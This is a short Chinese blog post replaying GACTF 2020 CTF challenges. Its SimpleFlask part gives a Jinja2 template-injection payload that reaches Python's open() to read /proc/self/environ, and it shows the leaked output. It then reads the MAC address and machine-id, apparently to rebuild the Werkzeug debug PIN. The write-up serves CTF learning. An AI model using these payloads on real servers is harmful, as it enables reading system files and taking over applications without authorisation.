2020GACTF题目复现

2020-09-02

没打比赛，赛后复现

0X01 Babyshop

0x02 SimpleFlask

1	name={{"".__class__.__base__.__subclasses__()[177].__init__.__globals__.__builtins__["open"]("/proc/self/environ").read()}}

hello HOSTNAME=79a0b2aa07d3HOME=/rootPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binDEBIAN_FRONTEND=noninteractivePWD=/home/ctfLC_CTYPE=C.UTF-8WERKZEUG_SERVER_FD=3WERKZEUG_RUN_MAIN=true!

1	/sys/class/net/eth0/address

hello 02:42:ac:15:00:06 !
2485378154502
/etc/machine-id
hello a8eb6cac33e701ae867269db5ce80e7f !
/usr/local/lib/python3.7/dist-packages/flask/app.py"

GACTF Writeup By星盟安全团队

作者: Mount4in
文章链接: http://mount4in.github.io/2020/09/02/2020GACTF题目复现/
版权声明: 本网站所有文章除特别声明外,均采用 CC BY-NC-ND 4.0 许可协议。转载请注明出处!